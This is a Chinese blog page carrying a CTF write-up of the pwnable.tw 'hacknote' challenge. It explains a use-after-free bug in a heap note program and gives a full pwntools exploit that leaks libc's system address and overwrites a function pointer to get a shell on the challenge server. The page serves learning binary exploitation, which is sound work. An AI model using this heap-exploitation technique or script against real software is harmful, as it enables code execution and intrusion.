<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Noto+Serif+SC:300,300italic,400,400italic,700,700italic|Lobster+Two:300,300italic,400,400italic,700,700italic|EB+Garamond:300,300italic,400,400italic,700,700italic|Roboto+Slab:300,300italic,400,400italic,700,700italic|Source+Code+Pro:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.14.0/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"driverxdw.github.io","root":"/","scheme":"Muse","version":"8.0.0-rc.5","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}};
  </script>

  <meta name="description" content="hacknote wp  – 白板uaf漏洞利用这道题是pwnable.tw上的一道200分的选单程序，题目给了你程序和libc文件。一般来这种都是根据功能分为好几个函数，我们需要将每一个函数中的逻辑搞清楚，然后在此基础上找到程序的漏洞.当然直接看的话可能会有难度，我们可以通过先随意构造输入使程序崩溃然后再用调试器去分析程序的处理，得到漏洞所在。">
<meta property="og:type" content="article">
<meta property="og:title" content="hacknote">
<meta property="og:url" content="https://driverxdw.github.io/2018/04/20/hacknote/index.html">
<meta property="og:site_name" content="in0va&#39;S Blog  JustLearnM0re">
<meta property="og:description" content="hacknote wp  – 白板uaf漏洞利用这道题是pwnable.tw上的一道200分的选单程序，题目给了你程序和libc文件。一般来这种都是根据功能分为好几个函数，我们需要将每一个函数中的逻辑搞清楚，然后在此基础上找到程序的漏洞.当然直接看的话可能会有难度，我们可以通过先随意构造输入使程序崩溃然后再用调试器去分析程序的处理，得到漏洞所在。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://driverxdw.github.io/2018/04/20/hacknote/img/add.png">
<meta property="og:image" content="https://driverxdw.github.io/2018/04/20/hacknote/img/delete.png">
<meta property="og:image" content="https://driverxdw.github.io/2018/04/20/hacknote/img/print.png">
<meta property="og:image" content="https://driverxdw.github.io/2018/04/20/hacknote/%E6%9E%84%E9%80%A0.png">
<meta property="og:image" content="https://driverxdw.github.io/2018/04/20/hacknote/free%E8%BF%87%E7%A8%8B.png">
<meta property="og:image" content="https://driverxdw.github.io/2018/04/20/hacknote/%E8%8B%A5%E5%88%86%E9%85%8D8%E5%AD%97%E8%8A%82.png">
<meta property="article:published_time" content="2018-04-20T00:37:40.000Z">
<meta property="article:modified_time" content="2020-09-11T15:52:46.614Z">
<meta property="article:author" content="XDW">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="PWN">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://driverxdw.github.io/2018/04/20/hacknote/img/add.png">


<link rel="canonical" href="https://driverxdw.github.io/2018/04/20/hacknote/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>hacknote | in0va'S Blog  JustLearnM0re</title>
  






  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">in0va'S Blog  JustLearnM0re</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">犯二</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">10</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">61</span></a>

  </li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <section class="post-toc-wrap sidebar-panel">
          <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#hacknote-wp-–-白板uaf漏洞利用"><span class="nav-number">1.</span> <span class="nav-text">hacknote wp  – 白板uaf漏洞利用</span></a></li></ol></div>
      </section>
      <!--/noindex-->

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="XDW"
      src="/images/author.jpg">
  <p class="site-author-name" itemprop="name">XDW</p>
  <div class="site-description" itemprop="description">一枚很菜但是仍在学习的二进制菜逼</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">61</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
        <span class="site-state-item-count">45</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll animated">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      友链
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://blog.ixuchao.cn/" title="https:&#x2F;&#x2F;blog.ixuchao.cn&#x2F;" rel="noopener" target="_blank">Archerx's Blog</a>
        </li>
    </ul>
  </div>

      </section>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">
      

      

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://driverxdw.github.io/2018/04/20/hacknote/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/author.jpg">
      <meta itemprop="name" content="XDW">
      <meta itemprop="description" content="一枚很菜但是仍在学习的二进制菜逼">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="in0va'S Blog  JustLearnM0re">
    </span>

    
    
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          hacknote
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2018-04-20 08:37:40" itemprop="dateCreated datePublished" datetime="2018-04-20T08:37:40+08:00">2018-04-20</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2020-09-11 23:52:46" itemprop="dateModified" datetime="2020-09-11T23:52:46+08:00">2020-09-11</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="hacknote-wp-–-白板uaf漏洞利用"><a href="#hacknote-wp-–-白板uaf漏洞利用" class="headerlink" title="hacknote wp  – 白板uaf漏洞利用"></a>hacknote wp  – 白板uaf漏洞利用</h1><p>这道题是pwnable.tw上的一道200分的选单程序，题目给了你程序和libc文件。一般来这种都是根据功能分为好几个函数，我们需要将每一个函数中的逻辑搞清楚，然后在此基础上找到程序的漏洞.当然直接看的话可能会有难度，我们可以通过先随意构造输入使程序崩溃然后再用调试器去分析程序的处理，得到漏洞所在。</p>
<a id="more"></a>
<p>打开ida开始分析程序发现逻辑是这样的：<br>首先有一个开始界面显示选项，功能是输出用户选项</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">puts</span>(<span class="string">"----------------------"</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">"       HackNote       "</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">"----------------------"</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">" 1. Add note          "</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">" 2. Delete note       "</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">" 3. Print note        "</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">" 4. Exit              "</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">"----------------------"</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="built_in">printf</span>(<span class="string">"Your choice :"</span>);</span><br></pre></td></tr></table></figure>
<p>然后输出之后是一个read操作从标准输入获取用户输入,之后就是四个主要函数，我把它们分别定义为add，delete，print以及exit，<br><img src="./img/add.png" alt="add函数"><br><img src="./img/delete.png" alt="delete函数"><br><img src="./img/print.png" alt="print函数"><br>根据经验，这是道堆题，所以可以把重心放在add和delete函数中，整理一下后发现逻辑是这样的:首先add函数中先malloc一个8个字节的空间，前四个字节用来存储print函数的地址，之后程序会根据用户输入的’note size’给content分配堆空间，然后将分配好的content堆地址存放到最初分配的8个字节的后四个字节，这之后程序获取用户输入的content内容存放到分配的’notesize’大小的堆空间中;delete函数中根据用户输入free掉note结构，但是这里并没有note中的指针设置为null，所以这里可以通过设置迷途指针触发UAF漏洞。<br>具体利用思路如下：<br>首先add两次，notesize只要不设置成8bytes就好，然后分别delete，这样bin中就会多出两个指向8bytes堆空间的指针，这时再add第三个note，并设置内容大小为8bytes，根据fastbin的LIFO的原则,note1的前8个字节存放note2的指针信息，note3的前8个字节存放新的内容，</p>
<figure class="highlight scheme"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(<span class="name">*ptr</span>[<span class="name">v1</span>])(<span class="name">ptr</span>[<span class="name">v1</span>])<span class="comment">;</span></span><br></pre></td></tr></table></figure>
<p>由于print函数中有一个执行note前四个字节指向函数的操作，只要改写了note的前8个字节，就能触发任意地址读和任意命令执行漏洞。<br><img src="./%E6%9E%84%E9%80%A0.png" alt="构造"><br>需要注意的是这里之前add的两次设置的notesize不能为8bytes，否则的话是无法利用的，因为根据fastbin的LIFO原则，后free掉的空间会先用来存储，而ida中我们可以看到是先free掉存放content的堆空间，然后再free掉note结构的8bytes空间，<br><img src="./free%E8%BF%87%E7%A8%8B.png" alt="free过程"><br>这样的话之后的add 8bytes就无法改写note结构前8bytes了。这里放上图。<br><img src="./%E8%8B%A5%E5%88%86%E9%85%8D8%E5%AD%97%E8%8A%82.png" alt="若分配8字节"><br>既然能任意地址读，那我们可以先泄露libc中system函数的地址,之后再进行一次delete和add执行system指令。<br>还有要注意的就是由于后四个字节不够存放<code>/bin/sh</code>字符串，这里有个操作就是system(‘||sh’)，<code>||sh</code>刚好占用4个字节。<br>嗯呐大体就是这样了,可以说是一个白板的UAF,然而就算是白板我也是看wp才做出来的，呜哇我好菜，快来个dalao拯救我一下~<br>综上，其实uaf漏洞归根结底是linux系统下堆内存管理机制的问题，但是如果代码写得不规范的话还是很容易引起漏洞的。  </p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#encoding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn import *</span><br><span class="line"><span class="keyword">from</span> pwnlib import *</span><br><span class="line"><span class="attribute">exe</span>=<span class="string">'./hacknote'</span></span><br><span class="line"><span class="comment">#r=process('./hacknote')</span></span><br><span class="line"><span class="attribute">r</span>=remote('chall.pwnable.tw',10102)</span><br><span class="line"><span class="comment">#gdb.attach(r,'''b *0x8048a41''')</span></span><br><span class="line">def <span class="builtin-name">add</span>(len,content):</span><br><span class="line">	r.recvuntil(<span class="string">'Your choice :'</span>)</span><br><span class="line">	r.sendline(<span class="string">'1'</span>)</span><br><span class="line">	r.recvuntil(<span class="string">'Note size :'</span>)</span><br><span class="line">	r.sendline(str(len))</span><br><span class="line">	r.recvuntil(<span class="string">'Content :'</span>)</span><br><span class="line">	r.sendline(content)</span><br><span class="line"></span><br><span class="line">def delete(index):</span><br><span class="line">	r.recvuntil(<span class="string">'Your choice :'</span>)</span><br><span class="line">	r.sendline(<span class="string">'2'</span>)</span><br><span class="line">	r.recvuntil(<span class="string">'Index :'</span>)</span><br><span class="line">	r.sendline(str(index))</span><br><span class="line"></span><br><span class="line">def show(index):</span><br><span class="line">	r.recvuntil(<span class="string">'Your choice :'</span>)</span><br><span class="line">	r.sendline(<span class="string">'3'</span>)</span><br><span class="line">	r.recvuntil(<span class="string">'Index :'</span>)</span><br><span class="line">	r.sendline(str(index))</span><br><span class="line"></span><br><span class="line">def leak():</span><br><span class="line">	<span class="attribute">libc</span>=ELF('./libc_32.so.6')</span><br><span class="line">	<span class="attribute">libc_read_addr</span>=libc.symbols[<span class="string">'free'</span>]</span><br><span class="line">	<span class="attribute">libc_system_addr</span>=libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">	<span class="builtin-name">add</span>(16,<span class="string">'deadbeef'</span>)</span><br><span class="line">	<span class="builtin-name">add</span>(16,<span class="string">'babycafe'</span>)</span><br><span class="line">	delete(0)</span><br><span class="line">	delete(1)</span><br><span class="line">	<span class="attribute">pri_got_addr</span>=0x804862b</span><br><span class="line">	<span class="attribute">read_got_addr</span>=0x0804A018</span><br><span class="line">	<span class="builtin-name">add</span>(8,p32(pri_got_addr)+p32(read_got_addr))	</span><br><span class="line">	show(0)</span><br><span class="line">	<span class="attribute">read_addr</span>=u32(r.recv(4))</span><br><span class="line">	<span class="attribute">system_addr</span>=read_addr-libc_read_addr+libc_system_addr	</span><br><span class="line">	return system_addr	</span><br><span class="line"></span><br><span class="line"><span class="attribute">leak_system_addr</span>=leak()</span><br><span class="line">delete(2)</span><br><span class="line"><span class="comment">#delete(1)</span></span><br><span class="line"><span class="comment">#delete(0)                                  #you have no node in [0], you only have content pointer in 0</span></span><br><span class="line"><span class="builtin-name">print</span> hex(leak_system_addr)</span><br><span class="line"><span class="builtin-name">add</span>(8,p32(leak_system_addr)+<span class="string">'||sh'</span>)</span><br><span class="line">show(0)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/PWN/" rel="tag"># PWN</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2018/04/20/silver_bullet/" rel="prev" title="silver_bullet">
                  <i class="fa fa-chevron-left"></i> silver_bullet
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2018/05/05/2018%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/" rel="next" title="2018国赛PWN复现">
                  2018国赛PWN复现 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
  
  
  



      

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

    </div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
      

      

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">XDW</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>



    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.0/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  















  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>








  

  

</body>
</html>
